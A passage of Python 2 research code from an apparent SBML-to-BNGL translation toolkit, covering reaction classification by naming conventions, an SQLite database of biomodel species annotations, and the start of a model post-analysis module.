for chemical in reactantList:
tmp = []
for element in chemical:
if intersection[element] > 0:
intersection[element] -= 1
else:
tmp.append(element)
newReactant.append(tmp)
for chemical in productList:
tmp = []
for element in chemical:
if intersection2[element] > 0:
intersection2[element] -= 1
else:
tmp.append(element)
newProduct.append(tmp)
return newReactant,newProduct
def findBiggestActionable(self,chemicalList, chemicalCandidatesList):
actionableList = []
for chemical,chemicalCandidates in zip(chemicalList,chemicalCandidatesList):
if len(chemicalCandidates) == 0:
return None
if len(chemicalCandidates) == 1:
actionableList.append([chemical])
continue
# find all combinations
scoreDict = []
result = 0
try:
for i in xrange(1, len(chemicalCandidates)+1):
combinations = list(itertools.permutations(chemicalCandidates,i))
for x in combinations:
score = difflib.SequenceMatcher(None,'_'.join(x), chemical).quick_ratio()
if score == 1:
result = x
raise IOError
elif score > 0:
scoreDict.append([x, score])
except IOError:
scoreDict = [[result,1.0]]
scoreDict.sort(key=lambda x:[x[1],-len(x[0])], reverse=True)
if len(scoreDict) > 0:
actionableList.append(list(scoreDict[0][0]))
else:
print actionableList
raise Exception
return actionableList
def breakByActionableUnit(self, reaction, strippedMolecules):
#find valid actionable units from the list of molecules in the system
validCandidatesReactants = [[y for y in strippedMolecules if y in x] for x in reaction[0]]
validCandidatesProducts = [[y for y in strippedMolecules if y in x] for x in reaction[1]]
# find the subset of intersection parts between reactants and products
intermediateVector = [list(itertools.ifilter(lambda x: any([len([z for z in difflib.ndiff(x,y) if '+' in z[0] or '-' in z[0]]) <= 3 for z in validCandidatesProducts for y in z]), sublist)) for sublist in validCandidatesReactants]
intermediateVector = [list(itertools.ifilter(lambda x: any([len([z for z in difflib.ndiff(x,y) if '+' in z[0] or '-' in z[0]]) <= 3 for z in intermediateVector for y in z]), sublist)) for sublist in validCandidatesProducts]
tmpReactant = [[list(itertools.ifilter(lambda y:len([x for x in intermediateVector[0] if y in x]) == 1, reactant))] for reactant in validCandidatesReactants]
tmpProduct = [[list(itertools.ifilter(lambda y:len([x for x in intermediateVector[0] if y in x]) == 1, reactant))] for reactant in validCandidatesProducts]
#print validCandidatesReactants,validCandidatesProducts,intermediateVector
#print '......',reaction
#print '\t......',validCandidatesReactants,validCandidatesProducts
#find biggest subset of actionable units
reactantList = self.findBiggestActionable(reaction[0],validCandidatesReactants)
productList = self.findBiggestActionable(reaction[1],validCandidatesProducts)
#print '\t\t+++++',reactantList,productList
return reactantList,productList
def testAgainstExistingConventions(self, fuzzyKey, modificationList, threshold=4):
@memoize
def testAgainstExistingConventionsHelper(fuzzyKey, modificationList, threshold):
if not fuzzyKey:
return None
for i in xrange(1, threshold):
combinations = itertools.permutations(modificationList, i)
validKeys = list(itertools.ifilter(lambda x: (''.join(x)).upper() == fuzzyKey.upper(), combinations))
if (validKeys):
return validKeys
return None
return testAgainstExistingConventionsHelper(fuzzyKey, modificationList, threshold)
def classifyReactions(self, reactions, molecules, externalDependencyGraph={}):
'''
classifies a group of reaction according to the information in the json
config file
FIXME:classifiyReactions function is currently the biggest bottleneck in atomizer, taking up
to 80% of the time without counting pathwaycommons querying.
'''
def createArtificialNamingConvention(reaction, fuzzyKey, fuzzyDifference):
'''
Does the actual data-structure filling if
a 1-1 reaction shows sign of modification. Returns True if
a change was performed
'''
#fuzzyKey,fuzzyDifference = self.processAdHocNamingConventions(reaction[0][0],reaction[1][0],localSpeciesDict,compartmentChangeFlag)
if fuzzyKey and fuzzyKey.strip('_').lower() not in [x.lower() for x in strippedMolecules]:
# if our state isnt yet on the dependency graph preliminary data structures
if '{0}'.format(fuzzyKey) not in equivalenceTranslator:
# print '---','{0}'.format(fuzzyKey),equivalenceTranslator.keys()
# check if there is a combination of existing keys that deals with this modification without the need of creation a new one
if self.testAgainstExistingConventions(fuzzyKey,self.namingConventions['modificationList']):
logMess('INFO:LAE005', 'added relationship through existing convention in reaction {0}'.format(str(reaction)))
if '{0}'.format(fuzzyKey) not in equivalenceTranslator:
equivalenceTranslator['{0}'.format(fuzzyKey)] = []
if '{0}'.format(fuzzyKey) not in indirectEquivalenceTranslator:
indirectEquivalenceTranslator['{0}'.format(fuzzyKey)] = []
if tuple(sorted([x[0] for x in reaction],key=len)) not in equivalenceTranslator['{0}'.format(fuzzyKey)]:
equivalenceTranslator['{0}'.format(fuzzyKey)].append(tuple(sorted([x[0] for x in reaction],key=len)))
return
logMess('INFO:LAE004', '{0}:{1}:added induced naming convention'.format(reaction[0][0],reaction[1][0]))
equivalenceTranslator['{0}'.format(fuzzyKey)] = []
if fuzzyKey == '0':
tmpState = 'ON'
else:
tmpState = fuzzyKey.upper()
adhocLabelDictionary['{0}'.format(fuzzyKey)] = ['{0}'.format(fuzzyKey),tmpState]
#fill main naming convention data structure
self.namingConventions['modificationList'].append('{0}'.format(fuzzyKey))
self.namingConventions['reactionState'].append(tmpState)
self.namingConventions['reactionSite'].append('{0}'.format(fuzzyKey))
self.namingConventions['patterns'][fuzzyDifference] = '{0}'.format(fuzzyKey)
self.namingConventions['definitions'].append({'rst':len(self.namingConventions['reactionState'])-1,
'rsi':len(self.namingConventions['reactionSite'])-1})
if fuzzyKey not in translationKeys:
translationKeys.append(fuzzyKey)
#if this same definition doesnt already exist. this is to avoid cycles
if tuple(sorted([x[0] for x in reaction],key=len)) not in equivalenceTranslator['{0}'.format(fuzzyKey)]:
equivalenceTranslator['{0}'.format(fuzzyKey)].append(tuple(sorted([x[0] for x in reaction],key=len)))
newTranslationKeys.append(fuzzyKey)
conventionDict[fuzzyDifference] = '{0}'.format(fuzzyKey)
if '{0}'.format(fuzzyKey) not in indirectEquivalenceTranslator:
indirectEquivalenceTranslator['{0}'.format(fuzzyKey)] = []
return True
return False
# load the json config file
reactionDefinition = self.loadConfigFiles(self.configurationFile)
rawReactions = []
for x in reactions:
tmp = parseReactions(x)
if tmp:
rawReactions.append(tmp)
#rawReactions = [parseReactions(x) for x in reactions if parseReactions(x)]
strippedMolecules = [x.strip('()') for x in molecules]
reactionnetworkelements = set([z for x in rawReactions for y in x for z in y])
#only keep those molecuels that appear in the reaction network
strippedMolecules = [x for x in strippedMolecules if x in reactionnetworkelements]
# load user defined complexes
if self.speciesEquivalences != None:
self.userEquivalences = self.loadConfigFiles(self.speciesEquivalences)['reactionDefinition']
# determines if two molecules have a relationship according to the naming convention section
#equivalenceTranslator is a dictionary of actual modifications
#example {'Phosporylation':[['A','A_p'],['B','B_p']]}
#process straightforward naming conventions
#XXX: we should take this function out of processNamingConventions2 and all process that calls it
tmpTranslator,translationKeys,conventionDict = detectOntology.analyzeNamingConventions(strippedMolecules,
self.userNamingConventions,similarityThreshold=10)
userEquivalenceTranslator, _, _ = self.processNamingConventions2(strippedMolecules,onlyUser=True)
for element in tmpTranslator:
if element in userEquivalenceTranslator:
userEquivalenceTranslator[element].extend(tmpTranslator[element])
else:
userEquivalenceTranslator[element] = tmpTranslator[element]
equivalenceTranslator = copy(userEquivalenceTranslator)
newTranslationKeys = []
adhocLabelDictionary = {}
# lists of plain reactions
# process fuzzy naming conventions based on reaction information
indirectEquivalenceTranslator = {x: [] for x in equivalenceTranslator}
localSpeciesDict = defaultdict(lambda: defaultdict(list))
trueBindingReactions = []
# the lexical dependencyGraph merely applies lexical analysis to detect which components in the left hand size
# matches to different ones in the right hand size of a given reaction
lexicalDependencyGraph = defaultdict(list)
strippedMolecules = [x.strip('()') for x in molecules]
#only keep those molecuels that appear in the reaction network
strippedMolecules = [x for x in strippedMolecules if x in reactionnetworkelements]
for idx,reaction in enumerate(rawReactions):
flagstar = False
if len(reaction[0]) == 1 and len(reaction[1]) == 1 \
and len(reaction[0][0]) > len(reaction[1][0]):
#unmodification/relaxatopn
flagstar = True
reaction = [reaction[1], reaction[0]]
#should we reuse information obtained from other methods?
#FIXME: instead of doing a simple split by '_' we should be comparing against the molecules in stripped molecules and split by smallest actionable units.
if externalDependencyGraph == {}:
#print '-----',reaction
#reactantString, productString = self.breakByActionableUnit(reaction, strippedMolecules)
#print '...',reaction, reactantString, productString
#if not reactantString or not productString:
reactantString = [x.split('_') for x in reaction[0]]
reactantString = [[y for y in x if y!=''] for x in reactantString]
productString = [x.split('_') for x in reaction[1]]
productString = [[y for y in x if y!=''] for x in productString]
else:
reactantString = []
productString = []
#check how the reactants are composed and add it to the list
for element in reaction[0]:
if element not in externalDependencyGraph or externalDependencyGraph[element] == []:
reactantString.append([element])
else:
reactantString.append(deepcopy(externalDependencyGraph[element][0]))
#same for products
for element in reaction[1]:
if element not in externalDependencyGraph or externalDependencyGraph[element] == []:
productString.append([element])
else:
productString.append(deepcopy(externalDependencyGraph[element][0]))
# remove those chemicals that match exactly on both sides since those are not interesting.
# and unlike lexical pattern matching we are not going to go around trying to increase string size
reactantString, productString = self.removeExactMatches(reactantString, productString)
if [0] in reactantString or [0] in productString:
continue
matching, matching2 = self.approximateMatching2(reactantString, productString, strippedMolecules, translationKeys)
#print reaction, matching
#if matching and flagstar:
# logMess('DEBUG:Atomization', 'inverting order of {0} for lexical analysis'.format([reaction[1], reaction[0]]))
flag = True
if matching:
for reactant,matches in zip(reaction[1],matching):
for match in matches:
pair = list(match)
pair.sort(key=len)
fuzzyList = self.processAdHocNamingConventions(pair[0],
pair[1],localSpeciesDict,False,strippedMolecules)
for fuzzyReaction,fuzzyKey,fuzzyDifference in fuzzyList:
if fuzzyKey == None and fuzzyReaction[0] != fuzzyReaction[1]:
flag= False
#logMess('Warning:ATOMIZATION','We could not a meaningful \
#mapping in {0} when lexically analyzing {1}.'.format(pair,reactant))
createArtificialNamingConvention(fuzzyReaction,
fuzzyKey, fuzzyDifference)
if flag and sorted([x[1] for x in matches]) not in lexicalDependencyGraph[reactant]:
# dont introduce cyclical dependencies
if all([x[1] != reactant for x in matches]):
lexicalDependencyGraph[reactant].append(sorted([x[1] for x in matches]))
for x in matches:
# TODO(Oct14): it would be better to try to map this to an
# existing molecule instead of trying to create a new one
if x[1] not in strippedMolecules:
if len(x[1]) > len(x[0]):
lexicalDependencyGraph[x[1]] = [[x[0]]]
else:
lexicalDependencyGraph[x[0]] = [[x[1]]]
lexicalDependencyGraph[x[1]] = []
translationKeys.extend(newTranslationKeys)
for species in localSpeciesDict:
speciesName = localSpeciesDict[species][localSpeciesDict[species].keys()[0]][0][0]
definition = [species]
sdefinition = [speciesName]
for component in localSpeciesDict[species]:
cdefinition = []
states = [["s",state[1]] for state in
localSpeciesDict[species][component]]
for state in states:
cdefinition.extend(state)
cdefinition = [component,cdefinition]
sdefinition.extend(cdefinition)
definition.append([sdefinition])
self.lexicalSpecies.append(definition)
#definition = [commonRoot,[[commonRoot,componentName,["s",tag]]]]
reactionClassification = self.getReactionClassification(reactionDefinition,
rawReactions,equivalenceTranslator,
indirectEquivalenceTranslator,
translationKeys)
for element in trueBindingReactions:
reactionClassification[element] = 'Binding'
listOfEquivalences = []
for element in equivalenceTranslator:
listOfEquivalences.extend(equivalenceTranslator[element])
return reactionClassification,listOfEquivalences,equivalenceTranslator, \
indirectEquivalenceTranslator,adhocLabelDictionary,lexicalDependencyGraph, \
userEquivalenceTranslator
def processAnnotations(self,molecules,annotations):
processedAnnotations = []
for element in annotations:
if len(annotations[element]) > 1:
pro = [list(x) for x in itertools.combinations([y for y in annotations[element]],2)]
processedAnnotations.extend(pro)
return {-1:processedAnnotations}
def classifyReactionsWithAnnotations(self,reactions,molecules,annotations,labelDictionary):
'''
this model will go through the list of reactions and assign a 'modification' tag to those reactions where
some kind of modification goes on aided through annotation information
'''
rawReactions = [parseReactions(x) for x in reactions]
equivalenceTranslator = self.processAnnotations(molecules,annotations)
for reactionIndex in range(0,len(rawReactions)):
for reactantIndex in range(0,len(rawReactions[reactionIndex])):
tmp = []
for chemicalIndex in range(0,len(rawReactions[reactionIndex][reactantIndex])):
tmp.extend(list(labelDictionary[rawReactions[reactionIndex][reactantIndex][chemicalIndex]]))
rawReactions[reactionIndex][reactantIndex] = tmp
#self.annotationClassificationHelper(rawReactions,equivalenceTranslator[-1])
def userJsonToDataStructure(self, patternName, userEquivalence, dictionary,
labelDictionary, equivalencesList):
'''
converts a user defined species to an internal representation
'''
tmp = st.Species()
label = []
for molecule in userEquivalence[1]:
if molecule[0] == 0:
labelDictionary[patterName] = 0
return
tmp2 = st.Molecule(molecule[0])
for componentIdx in range(1, len(molecule), 2):
tmp3 = st.Component(molecule[componentIdx])
for bindStateIdx in range(0, len(molecule[componentIdx + 1]), 2):
if molecule[componentIdx + 1][bindStateIdx] == "b":
tmp3.addBond(molecule[componentIdx + 1][bindStateIdx + 1])
elif molecule[componentIdx + 1][bindStateIdx] == "s":
tmp3.addState('0')
tmp3.addState(molecule[componentIdx + 1][bindStateIdx + 1])
equivalencesList.append([patternName, molecule[0]])
#tmp3.addState(molecule[2][2])
tmp2.addComponent(tmp3)
stmp = st.Species()
stmp.addMolecule(deepcopy(tmp2))
stmp.reset()
# in case one definition overlaps another
if molecule[0] in dictionary:
dictionary[molecule[0]].extend(deepcopy(stmp))
else:
dictionary[molecule[0]] = deepcopy(stmp)
labelDictionary[molecule[0]] = [(molecule[0],)]
label.append(molecule[0])
#for component in tmp2.components:
# if component.name == molecule[1]:
# component.setActiveState(molecule[2][1])
tmp.addMolecule(tmp2)
if patternName in dictionary:
dictionary[patternName].extend(deepcopy(tmp))
else:
dictionary[patternName] = deepcopy(tmp)
labelDictionary[patternName] = [tuple(label)]
def getUserDefinedComplexes(self):
dictionary = {}
partialDictionary = {}
userLabelDictionary = {}
equivalencesList = []
lexicalLabelDictionary = {}
if self.speciesEquivalences is not None:
speciesdictionary = self.loadConfigFiles(self.speciesEquivalences)
userEquivalences = speciesdictionary['complexDefinition'] \
if 'complexDefinition' in speciesdictionary else None
for element in userEquivalences:
self.userJsonToDataStructure(element[0], element, dictionary,
userLabelDictionary, equivalencesList)
complexEquivalences = speciesdictionary['modificationDefinition']
for element in complexEquivalences:
userLabelDictionary[element] = [tuple(complexEquivalences[element])]
partialUserEquivalences = speciesdictionary['partialComplexDefinition'] \
if 'partialComplexDefinition' in speciesdictionary else []
for element in partialUserEquivalences:
self.userJsonToDataStructure(tuple(sorted(element[0])), element, partialDictionary,
{}, [])
#stuff we got from string similarity
for element in self.lexicalSpecies:
self.userJsonToDataStructure(element[0], element, dictionary, lexicalLabelDictionary,
equivalencesList)
return dictionary, userLabelDictionary, lexicalLabelDictionary, partialDictionary
```
#### File: SBMLparser/merging/namingDatabase.py
```python
import sqlite3
import utils.annotationExtractor
import utils.annotationResolver
import argparse
import os
from copy import copy
import pprint
import fnmatch
import progressbar
import enum
import utils.readBNGXML
Query = enum.Enum('Query', 'all organism species family')
organismFamilies = {'mammals': ['Homo sapiens', 'Mammalia', 'Mus musculus', 'Rattus norvegicus', 'Rattus rattus']}
def getFiles(directory, extension):
"""
Gets a list of <*.extension> files. include subdirectories and return the absolute
path. also sorts by size.
"""
matches = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, '*.{0}'.format(extension)):
matches.append([os.path.join(root, filename), os.path.getsize(os.path.join(root, filename))])
# sort by size
matches.sort(key=lambda filename: filename[1], reverse=False)
matches = [x[0] for x in matches]
return matches
class NamingDatabase:
def __init__(self, databaseName):
self.databaseName = databaseName
def getAnnotationsFromSpecies(self, speciesName):
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT annotationURI,annotationName from moleculeNames as M join identifier as I ON M.ROWID == I.speciesID join annotation as A on A.ROWID == I.annotationID and M.name == "{0}"'.format(speciesName)
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getFileNameFromSpecies(self, speciesName):
"""
species name refers to a molecular species
"""
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT B.file,M.name from moleculeNames as M join biomodels as B on B.ROWID == M.fileID WHERE M.name == "{0}"'.format(speciesName)
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getFileNameFromOrganism(self, organismName):
"""
pass
"""
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT B.file,A.annotationName from biomodels as B join annotation as A on B.organismID == A.ROWID WHERE A.annotationName == "{0}"'.format(organismName)
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getOrganismNames(self):
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT DISTINCT A.annotationName from biomodels as B join annotation as A on B.organismID == A.ROWID'
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getSpeciesFromAnnotations(self, annotation):
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT name,A.annotationURI from moleculeNames as M join identifier as I ON M.ROWID == I.speciesID join annotation as A on A.ROWID == I.annotationID and A.annotationURI == "{0}"'.format(annotation)
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getFilesInDatabase(self):
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT file from biomodels'
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getSpeciesFromFileName(self, fileName):
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT B.file,name,A.annotationURI,A.annotationName,qualifier from moleculeNames as M join identifier as I ON M.ROWID == I.speciesID \
join annotation as A on A.ROWID == I.annotationID join biomodels as B on B.ROWID == M.fileID and B.file == "{0}"'.format(fileName)
#I.qualifier != "BQB_HAS_PART" and \
#I.qualifier != "BQB_HAS_VERSION" AND I.qualifier != "BQB_HAS_PROPERTY"'.format(fileName)
speciesList = [x[1:] for x in cursor.execute(queryStatement)]
tmp = {x[0]: set([]) for x in speciesList}
tmp2 = {x[0]: set([]) for x in speciesList}
tmp3 = {x[0]: set([]) for x in speciesList}
tmp4 = {x[0]: set([]) for x in speciesList}
for x in speciesList:
if x[3] in ["BQB_IS", "BQM_IS", "BQB_IS_VERSION_OF"]:
tmp[x[0]].add(x[1])
if x[2] != '':
tmp2[x[0]].add(x[2])
tmp3[x[0]].add(x[3])
else:
tmp4[x[0]].add((x[1], x[3]))
tmp = [{'name': set([x]), 'annotation': set(tmp[x]), 'annotationName': set(tmp2[x]), 'fileName': set([fileName]), 'qualifier': tmp3[x], 'otherAnnotation':[tmp4[x]] if tmp4[x] else []} for x in tmp]
return tmp
def findOverlappingNamespace(self, fileList):
fileSpecies = []
if len(fileList) == 0:
fileList = self.getFilesInDatabase()
progress = progressbar.ProgressBar(maxval=len(fileList)).start()
for idx in progress(range(len(fileList))):
fileSpecies.extend(self.getSpeciesFromFileName(fileList[idx]))
changeFlag = True
fileSpeciesCopy = copy(fileSpecies)
print 'finished processing files, obtained {0} groups'.format(len(fileSpecies))
#progress = progressbar.ProgressBar(maxval=len((fileSpecies - 1) * (fileSpecies -1))).start()
while changeFlag:
try:
changeFlag = False
for idx in range(0, len(fileSpecies) - 1):
for idx2 in range(idx+1, len(fileSpecies)):
#if (len(fileSpecies[idx]['name']) > 2 and fileSpecies[idx]['name'].intersection(fileSpecies[idx2]['name'])) \
if fileSpecies[idx]['annotation'].intersection(fileSpecies[idx2]['annotation']) \
or fileSpecies[idx]['annotationName'].intersection(fileSpecies[idx2]['annotationName']):
#print 'hello',fileSpecies[idx]['annotationName'],fileSpecies[idx2]['annotationName']
fileSpeciesCopy[idx]['name'] = fileSpeciesCopy[idx]['name'].union(fileSpeciesCopy[idx2]['name'])
fileSpeciesCopy[idx]['annotation'] = fileSpeciesCopy[idx]['annotation'].union(fileSpeciesCopy[idx2]['annotation'])
fileSpeciesCopy[idx]['annotationName'] = fileSpeciesCopy[idx]['annotationName'].union(fileSpeciesCopy[idx2]['annotationName'])
fileSpeciesCopy[idx]['fileName'] = fileSpeciesCopy[idx]['fileName'].union(fileSpeciesCopy[idx2]['fileName'])
fileSpeciesCopy[idx]['qualifier'] = fileSpeciesCopy[idx]['qualifier'].union(fileSpeciesCopy[idx2]['qualifier'])
fileSpeciesCopy[idx]['otherAnnotation'].extend(fileSpeciesCopy[idx2]['otherAnnotation'])
del fileSpeciesCopy[idx2]
fileSpecies = fileSpeciesCopy
raise IOError
except IOError:
changeFlag = True
continue
#fileSpecies = [[x['name'], len(x['fileName'])] for x in fileSpecies]
fileSpecies.sort(key=lambda x: len(x['fileName']), reverse=True)
#import pickle
#with open('results.dump','wb') as f:
# pickle.dump(fileSpecies,f)
return fileSpecies
def isFileInDatabase(self, fileName):
return isFileInDatabase(self.databaseName, fileName)
def isFileInDatabase(databaseName, fileName):
connection = sqlite3.connect(databaseName)
cursor = connection.cursor()
queryStatement = 'select file from biomodels WHERE file == "{0}"'.format(fileName)
matchingFileNames = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return len(matchingFileNames) > 0
def setupDatabase(databaseName):
connection = sqlite3.connect(databaseName)
cursor = connection.cursor()
cursor.execute('''CREATE TABLE biomodels(file UNIQUE, organismID INT, FOREIGN KEY(organismID) REFERENCES annotation(ROWID))''')
cursor.execute('''CREATE TABLE moleculeNames(fileId INT,name, FOREIGN KEY(fileID) REFERENCES biomodels(file))''')
cursor.execute('''CREATE TABLE annotation(annotationURI UNIQUE ON CONFLICT IGNORE,annotationName)''')
cursor.execute('''CREATE TABLE identifier(annotationID INT, qualifier, speciesID INT, FOREIGN KEY(speciesID) \
REFERENCES moleculeName(ROWID), FOREIGN KEY(annotationID) references annotation(ROWID))''')
cursor.execute('''CREATE TABLE bond(fileName INT, moleculeID1 INT, moleculeID2 INT, FOREIGN KEY(fileName) REFERENCES biomodels(ROWID), \
FOREIGN KEY(moleculeID1) REFERENCES moleculeNames(ROWID), FOREIGN KEY(moleculeID2) REFERENCES moleculeNames(ROWID))''')
connection.commit()
connection.close()
def extractBasicAnnotations(fileName, userDefinitions=None):
annotations = utils.annotationExtractor.AnnotationExtractor(fileName, userDefinitions)
elementalMolecules = [x for x in annotations.sct if annotations.sct[x] == []]
speciesAnnotations = {x: annotations.getAnnotationSystem()[x] for x in elementalMolecules}
modelAnnotations = annotations.getModelAnnotations()
return speciesAnnotations, modelAnnotations
def populateDatabaseFromFile(fileName, databaseName, userDefinitions=None):
"""
Insert annotations from file <fileName>
"""
fileName2 = fileName.split(os.sep)[-1]
if isFileInDatabase(databaseName, fileName2):
print('Database already contains annotation from file {0}'.format(fileName2))
return -1
connection = sqlite3.connect(databaseName)
cursor = connection.cursor()
basicModelAnnotations, generalModelAnnotations = extractBasicAnnotations(fileName, userDefinitions)
moleculeNames = []
annotationNames = []
moleculeAnnotations = []
modelSpecies = ''
# insert model description
for annotation in generalModelAnnotations:
if 'taxonomy' in annotation[1]:
modelSpecies = annotation
break
annotationNames.append(utils.annotationResolver.resolveAnnotation(annotation[1]))
cursor.executemany("INSERT into annotation(annotationURI,annotationName) values (?, ?)", annotationNames)
connection.commit()
annotationID = [x for x in cursor.execute('select ROWID from annotation WHERE annotationURI == "{0}"'.format(annotationNames[-1][0]))][0][0]
annotationNames = []
cursor.executemany("INSERT into biomodels(file,organismID) values (?,?)", [[fileName2, annotationID]])
connection.commit()
modelID = [x for x in cursor.execute('select ROWID from biomodels WHERE file == "{0}"'.format(fileName2))][0][0]
# insert moleculeNames
for molecule in basicModelAnnotations:
moleculeNames.append([modelID, molecule])
annotationIDs = {x[1]: x[0] for x in cursor.execute("select ROWID,annotationURI from annotation")}
# insert annotations
for molecule in basicModelAnnotations:
for annotationType in basicModelAnnotations[molecule]:
for annotation in basicModelAnnotations[molecule][annotationType]:
if annotation not in annotationIDs:
annotationName = utils.annotationResolver.resolveAnnotation(annotation)
annotationNames.append([annotation, annotationName[1]])
cursor.executemany("INSERT into annotation(annotationURI,annotationName) values (?, ?)", annotationNames)
connection.commit()
cursor.executemany("INSERT into moleculeNames(fileId,name) values (?, ?)", moleculeNames)
connection.commit()
moleculeIDs = {x[1]: x[0] for x in cursor.execute("select ROWID,name from moleculeNames WHERE moleculeNames.fileId == '{0}'".format(modelID))}
annotationIDs = {x[1]: x[0] for x in cursor.execute("select ROWID,annotationURI from annotation")}
for molecule in basicModelAnnotations:
for annotationType in basicModelAnnotations[molecule]:
for annotation in basicModelAnnotations[molecule][annotationType]:
moleculeAnnotations.append([annotationIDs[annotation], moleculeIDs[molecule], annotationType])
cursor.executemany("insert into identifier(annotationID,speciesID, qualifier) values (?, ?, ?)", moleculeAnnotations)
connection.commit()
connection.close()
def populateBondDatabaseFromFile(fileName, databaseName):
pass
def defineConsole():
parser = argparse.ArgumentParser(description='SBML to BNGL translator')
parser.add_argument('-c', '--create', action='store_true', help='Create database tables')
parser.add_argument('-d', '--database', type=str, help='database to modify', required=True)
parser.add_argument('-i', '--input-file', type=str, help='input SBML file')
parser.add_argument('-u', '--user_conventions', type=str, help='Use user convention definitions for SCT calculation')
parser.add_argument('-q', '--query', type=str, help='Query a database for its common namespace')
parser.add_argument('-s', '--specific_query', type=str, help='search for models with a given molecule')
parser.add_argument('-r', '--directory', type=str, help='Add SBML models in directory "directory" to database')
#parser.add_argument('-o','--output-file',type=str,help='output SBML file',required=True)
return parser
def query(database, queryType, queryOptions):
db = NamingDatabase(database)
#db.getAnnotationsFromSpecies('EGFR')
#db.getSpeciesFromAnnotations('http://identifiers.org/uniprot/P00533')
#print db.getSpeciesFromFileName('BIOMD0000000048.xml')
try:
if Query[queryType] == Query.species:
if queryOptions is None:
print "Species query must indicate a species to search for using the '-s' flag"
return
selectedFiles = db.getFileNameFromSpecies(queryOptions)
result = db.findOverlappingNamespace(selectedFiles)
elif Query[queryType] == Query.organism:
if queryOptions is not None:
selectedFiles = db.getFileNameFromOrganism(queryOptions)
if selectedFiles != []:
result = db.findOverlappingNamespace(selectedFiles)
else:
result = []
else:
result = {}
organismNames = db.getOrganismNames()
for organism in organismNames:
selectedFiles = db.getFileNameFromOrganism(organism)
print organism, len(selectedFiles)
result[organism] = db.findOverlappingNamespace(selectedFiles)
elif Query[queryType] == Query.family:
result = {}
if queryOptions is None:
selectedFiles = []
for family in organismFamilies:
selectedFiles.extend(db.getFileNameFromSpecies(family))
result['mammalsFamily'] = db.findOverlappingNamespace(selectedFiles)
elif Query[queryType] == Query.all:
result = db.findOverlappingNamespace([])
#pprint.pprint([[x['name'], len(x['fileName'])] for x in result])
import pickle
with open('results2.dump', 'wb') as f:
pickle.dump(result, f)
except KeyError:
print 'Query operation not supported'
if __name__ == "__main__":
parser = defineConsole()
namespace = parser.parse_args()
if namespace.query:
query(namespace.database, namespace.query, namespace.specific_query)
else:
if namespace.create:
setupDatabase(namespace.database)
if namespace.input_file:
userDefinitions = namespace.user_conventions
populateDatabaseFromFile(namespace.input_file, namespace.database, userDefinitions)
if namespace.directory:
sbmlFiles = getFiles(namespace.directory, 'xml')
progress = progressbar.ProgressBar(maxval=len(sbmlFiles)).start()
for idx in progress(range(len(sbmlFiles))):
populateDatabaseFromFile(sbmlFiles[idx], namespace.database, None)
```
#### File: SBMLparser/rulifier/postAnalysis.py
```python
import componentGroups
import argparse
import pprint
from collections import defaultdict
import itertools
from copy import copy
from utils import readBNGXML
import functools
import marshal
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = marshal.dumps([args, kwargs])
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
@memoize
def resolveEntry(dependencyGraph, moleculeSet):
"""
resolve an entry to its basic components according to dependency graph
>>> dependencyGraph = {'EGF_EGFR_2':[['EGF_EGFR','EGF_EGFR']],'EGF_EGFR':[['EGF','EGFR']],'EGFR':[],'EGF':[]}
>>> resolveEntry(dependencyGraph, ['EGF_EGFR_2'])
['EGF', 'EGFR', 'EGF', 'EGFR']
"""
if type(moleculeSet) == str:
return [moleculeSet]
if len(moleculeSet) == 1 and dependencyGraph[moleculeSet[0]] == []:
return moleculeSet
compositionList = []
for molecule in moleculeSet:
if len(dependencyGraph[molecule]) == 0:
compositionList.append(molecule)
else:
compositionList.extend(resolveEntry(dependencyGraph, dependencyGraph[molecule][0]))
return compositionList
class ModelLearning:
def __init__(self, fileName,rawFileName=None):
self.molecules, self.rules, _ = readBNGXML.parseXML(fileName)
self.dependencies, self.patternXreactions, _, _ = componentGroups.getContextRequirements(fileName, collapse=False)
self.transposePatternsReactions()
self.reverseDependencies = componentGroups.reverseContextDict(self.dependencies)
self.moleculeMotifDict, self.motifMoleculeDict = self.classifyPairsByMotif(self.reverseDependencies)
if rawFileName:
self.processRawSBML(rawFileName)
else:
self.rawRules = {}
def processRawSBML(self,inputfile):
_, rawrules, _ = readBNGXML.parseXML(inputfile)
self.rawRules = {x[0].label: x[0] for x in rawrules}
def transposePatternsReactions(self):
self.reactionsXpatterns = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))
for product in self.patternXreactions:
for reactionCenter in self.patternXreactions[product]:
for contextcomponent in self.patternXreactions[product][reactionCenter]:
for contextState in self.patternXreactions[product][reactionCenter][contextcomponent]:
for reaction in self.patternXreactions[product][reactionCenter][contextcomponent][contextState]:
self.reactionsXpatterns[reaction][product][reactionCenter].append((contextcomponent, contextState))
def classifyPairsByMotif(self, reverseDependencies):
"""
recives a dict arranged by molecule->componentPair->dependency
organizes molecule pairs by a concept called 'motif'
"""
motifDependencies = defaultdict(lambda: defaultdict(list))
motifDependencies2 = defaultdict(lambda: defaultdict(list))
for molecule in reverseDependencies:
for moleculePair in reverseDependencies[molecule]:
motifDependencies[molecule][frozenset(moleculePair)].append(reverseDependencies[molecule][moleculePair])
for molecule in motifDependencies:
for moleculePair in motifDependencies[molecule]:
requirementPair = tuple(sorted(motifDependencies[molecule][moleculePair]))
motifDependencies2[requirementPair][molecule].append(moleculePair)
return motifDependencies, motifDependencies2
